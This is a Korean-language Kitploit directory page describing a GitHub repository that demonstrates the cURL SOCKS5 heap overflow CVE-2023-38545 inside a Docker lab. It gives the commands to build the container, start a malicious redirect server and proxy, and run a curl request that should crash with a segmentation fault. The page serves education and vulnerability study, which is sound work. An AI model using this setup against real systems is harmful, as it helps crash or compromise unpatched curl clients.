Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-38545-sample — 익스플로잇 데모에 필요한 모든 설정 파일이 포함된 Dockerfile | Kitploit
도구/GitHubGitHub/vanigori/cve-2023-38545-sample
Container SecurityVulnerability AnalysisExploitationWeb SecurityLearning & EducationLabs & Practice
GitHubvanigori/cve-2023-38545-sample

CVE-2023-38545-sample

익스플로잇 데모에 필요한 모든 설정 파일이 포함된 Dockerfile

저장소 보기
322년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

간단한 설명

이것은 cURL CVE-2023-38545를 시연합니다. 제가 만들 수 있는 한 가장 가볍게 만들었습니다.

설정

먼저 Docker 이미지를 빌드하세요:

docker build . -t cveimage

다음으로, 이미지 파일을 간단히 실행하여 임시 Docker 컨테이너를 생성할 수 있습니다. 이 컨테이너는 중지되면 삭제됩니다:

docker run --rm --tty --net="host" --name cvecontainer cveimage

명령어 입력이 어려우면 다른 터미널을 열고 다음을 실행하세요:

docker exec -it cvecontainer /bin/bash

이제 모든 서비스를 시작해야 합니다. 이미 실행 중인 컨테이너에 연결한 후 다음을 실행하세요:

./exploit/malicious_redirect_server.sh &

python3 /exploit/proxy.py &

이제 컨테이너 내부에서 cURL 취약점이 실행되는 모습을 확인할 수 있습니다:

curl -vvv --limit-rate 100 --location --proxy socks5h://127.0.0.1:1080 http://localhost:8000

취약점이 성공했는지 확인하려면 curl 명령어를 실행한 시스템에서 세그멘테이션 오류(segmentation fault)가 발생해야 합니다. 오류가 보이지 않는다면 취약점이 발생하지 않았거나, 프로세스에 힙 공간이 너무 많아 접근할 수 없는 메모리를 덮어쓰지 못한 것입니다.

추가 작업 (PR 환영)

  • 이 README를 보기 좋게 꾸미기
  • systemd가 취약점 코드를 자동으로 시작하도록 설정
  • Docker 이미지 빌드 시간과 크기 줄이기
  • 그 밖의 무엇이든...?

참고 자료

  • socks5 프록시는 직접 만든 것이 아닙니다. 프록시의 원본 코드는 여기에서 찾을 수 있습니다: https://github.com/alexbers/tgsocksproxy
    • 원래 ubuntu (wsl)에서 systemd 지원과 함께 악용되었습니다: https://github.com/aire1/mtproxy_autoinstaller
  • 연구 시간을 엄청나게 절약해 준 hackerone 리포트입니다. 이 취약점이 어떻게 발생하는지 이해하고 싶다면 한번 읽어보세요: https://hackerone.com/reports/2187833
도구 다운로드